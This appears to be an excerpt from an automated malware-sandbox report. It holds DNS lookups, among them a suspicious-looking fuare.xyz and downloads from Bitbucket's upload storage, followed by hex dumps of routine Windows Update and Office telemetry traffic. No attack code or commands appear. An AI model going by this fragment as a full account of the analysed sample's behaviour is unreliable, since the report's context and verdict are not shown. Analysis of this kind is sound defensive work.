                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.622364998 CET1.1.1.1192.168.2.50x6a82No error (0)fuare.xyz116.203.0.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:01.364509106 CET1.1.1.1192.168.2.50xe6e3No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:01.364620924 CET1.1.1.1192.168.2.50x5bf3No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:07.089235067 CET1.1.1.1192.168.2.50x8056No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:07.089235067 CET1.1.1.1192.168.2.50x8056No error (0)plus.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:07.090204954 CET1.1.1.1192.168.2.50xc399No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.916841984 CET1.1.1.1192.168.2.50x55ecNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.918106079 CET1.1.1.1192.168.2.50x63a1No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.918535948 CET1.1.1.1192.168.2.50x5dbdNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.918535948 CET1.1.1.1192.168.2.50x5dbdNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.919737101 CET1.1.1.1192.168.2.50xe4c6No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.547949076 CET1.1.1.1192.168.2.50x41d4No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.548429012 CET1.1.1.1192.168.2.50xeff6No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.069112062 CET1.1.1.1192.168.2.50x76fcNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.069112062 CET1.1.1.1192.168.2.50x76fcNo error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.069546938 CET1.1.1.1192.168.2.50xa4f0No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.832180023 CET1.1.1.1192.168.2.50x3bddNo error (0)sb.scorecardresearch.com18.245.60.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.832180023 CET1.1.1.1192.168.2.50x3bddNo error (0)sb.scorecardresearch.com18.245.60.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.832180023 CET1.1.1.1192.168.2.50x3bddNo error (0)sb.scorecardresearch.com18.245.60.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.832180023 CET1.1.1.1192.168.2.50x3bddNo error (0)sb.scorecardresearch.com18.245.60.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.835702896 CET1.1.1.1192.168.2.50xd2a0No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.839940071 CET1.1.1.1192.168.2.50x13d0No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.845887899 CET1.1.1.1192.168.2.50x2675No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.845917940 CET1.1.1.1192.168.2.50x66d7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.859189987 CET1.1.1.1192.168.2.50xf9b5No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.859221935 CET1.1.1.1192.168.2.50xc8b1No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.833466053 CET1.1.1.1192.168.2.50x6174No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:17.833466053 CET1.1.1.1192.168.2.50x6174No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.176393986 CET1.1.1.1192.168.2.50xbcb7No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.176754951 CET1.1.1.1192.168.2.50xd594No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.176754951 CET1.1.1.1192.168.2.50xd594No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.510703087 CET1.1.1.1192.168.2.50x1f63No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.510740042 CET1.1.1.1192.168.2.50x27fbNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.510740042 CET1.1.1.1192.168.2.50x27fbNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.510767937 CET1.1.1.1192.168.2.50xaa0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.510767937 CET1.1.1.1192.168.2.50xaa0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.510801077 CET1.1.1.1192.168.2.50x807cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.517036915 CET1.1.1.1192.168.2.50xbe10No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.517036915 CET1.1.1.1192.168.2.50xbe10No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.517369032 CET1.1.1.1192.168.2.50xc02bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412667990 CET1.1.1.1192.168.2.50xc30cNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412667990 CET1.1.1.1192.168.2.50xc30cNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:21.228497982 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:21.228497982 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:22.229896069 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:22.229896069 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:23.244005919 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:23.244005919 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:25.515502930 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:25.515502930 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:29.274218082 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:29.274218082 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.382217884 CET1.1.1.1192.168.2.50xd5c8No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.382217884 CET1.1.1.1192.168.2.50xd5c8No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.382217884 CET1.1.1.1192.168.2.50xd5c8No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.30.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.20.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.10.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.25.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com52.217.229.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.29.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com16.15.216.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com16.182.68.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:27:23.006633997 CET1.1.1.1192.168.2.50xe36aNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:15.200026989 CET1.1.1.1192.168.2.50x7a9cNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:43.010230064 CET1.1.1.1192.168.2.50xfe29No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:29:23.119831085 CET1.1.1.1192.168.2.50xd4feNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:30:23.181941986 CET1.1.1.1192.168.2.50x6b2fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:31:15.228418112 CET1.1.1.1192.168.2.50x4edNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:32:19.161128044 CET1.1.1.1192.168.2.50x35b4No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:33:31.213044882 CET1.1.1.1192.168.2.50x7cfaNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                        0192.168.2.54970420.109.210.53443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OKvleD1bOO+N2GM&MD=X99kat3G HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                                                        MS-CorrelationId: be3f8952-480f-46b6-927e-7361c0324afa
                                                                                                                                                                                                                                                                                                                                                        MS-RequestId: 7d082424-bf95-4ae0-a4d1-73995563d4d0
                                                                                                                                                                                                                                                                                                                                                        MS-CV: rGemSLecdEK+nLex.0
                                                                                                                                                                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:16 GMT
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        1192.168.2.54970713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:17 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 13 Nov 2024 03:39:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DD0394CDDBD898"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 406a0d50-a01e-0002-58e4-355074000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142517Z-1749fc9bdbd2c44rhC1DFWbxe000000002sg000000002efr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:17 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
